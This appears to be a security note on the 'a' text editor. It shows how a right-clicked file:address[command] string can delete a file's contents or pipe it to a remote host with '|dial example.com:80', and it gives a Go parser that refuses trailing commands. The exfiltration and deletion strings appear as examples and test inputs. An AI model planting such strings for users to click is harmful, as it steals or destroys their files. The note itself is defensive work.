Right clicking opens look.go in a new window, selects all bytes in the window, and deletes them.
C:\g\src\github.com\as\a\look.go:,d
Although command execution is possible with button 2, it is unexpected with look. An adversary could construct a chain of commands in this form:
C:\g\src\github.com\as\a\look.go:,|dial example.com:80
This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.
The real issue is the ability to use commands like w and r to write and read the files on disk unexpectedly.
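To make the file:address[command] split concrete, here is a small model written for this note (it is not the a editor's own parser, and the address grammar is a simplified version of sam's). ParseLook separates the file name, the address and whatever trails the address; LookAddressOnly is the check a button-3 handler would apply: open the file and select the address, but refuse to execute a trailing command such as d, w, r or |cmd. The drive-letter handling for C:\ paths and the function names are assumptions made for this example.

```go
package main

import (
	"fmt"
	"strings"
)

// LookTarget is the result of splitting a right-clicked (button 3) string of
// the form file:address[command]. Simplified model for this note, not the a
// editor's own representation.
type LookTarget struct {
	File    string // path to open
	Address string // sam-style address, e.g. "," or "3,5" or "/regex/"
	Command string // anything after the address, e.g. "d", "|dial host:80", "w"
}

// splitFile separates the file name from the address spec. A Windows drive
// prefix (C:\...) contains a colon that is not an address separator, so it is
// skipped before the split (assumption: a editor paths may be Windows paths).
func splitFile(s string) (file, spec string) {
	start := 0
	if len(s) >= 3 && s[1] == ':' && (s[2] == '\\' || s[2] == '/') {
		start = 2
	}
	i := strings.IndexByte(s[start:], ':')
	if i < 0 {
		return s, ""
	}
	return s[:start+i], s[start+i+1:]
}

// addressLen returns how many leading bytes of spec form an address: line
// numbers, '#' byte offsets, '.', '$', ',', ';', '+', '-', and /regex/ or
// ?regex? searches. Everything after that is treated as a command.
func addressLen(spec string) int {
	i := 0
	for i < len(spec) {
		c := spec[i]
		switch {
		case c >= '0' && c <= '9', c == '#', c == '.', c == '$', c == ',', c == ';', c == '+', c == '-':
			i++
		case c == '/' || c == '?':
			// skip to the matching unescaped delimiter
			j := i + 1
			for j < len(spec) && spec[j] != c {
				if spec[j] == '\\' {
					j++ // skip the escaped byte
				}
				j++
			}
			if j >= len(spec) {
				return len(spec) // unterminated search: all of it is address
			}
			i = j + 1
		default:
			return i
		}
	}
	return i
}

// ParseLook splits a look target into file, address and trailing command.
func ParseLook(s string) LookTarget {
	file, spec := splitFile(s)
	n := addressLen(spec)
	return LookTarget{File: file, Address: spec[:n], Command: spec[n:]}
}

// LookAddressOnly accepts a file and an address but rejects any trailing
// command, so a click on "look.go:,d" selects the whole file instead of
// deleting it.
func LookAddressOnly(s string) (LookTarget, error) {
	t := ParseLook(s)
	if t.Command != "" {
		return t, fmt.Errorf("look: refusing to run command %q on %s", t.Command, t.File)
	}
	return t, nil
}

func main() {
	// Constructed inputs modelled on the strings discussed above.
	for _, s := range []string{
		`C:\g\src\github.com\as\a\look.go:,d`,
		`C:\g\src\github.com\as\a\look.go:,|dial example.com:80`,
		`C:\g\src\github.com\as\a\look.go:3,5`,
		`look.go:/func main/`,
		`look.go:,w C:\tmp\copy.go`,
	} {
		t, err := LookAddressOnly(s)
		fmt.Printf("%-58s file=%s addr=%q cmd=%q err=%v\n", s, t.File, t.Address, t.Command, err)
	}
}
```

The point of the check is that button 3 is a navigation gesture: a user who right-clicks a path expects a window to open and a selection to be made, never for bytes to be deleted, piped to a socket, or written to another file. Keeping the command suffix out of the look path leaves button 2 as the only way to execute anything.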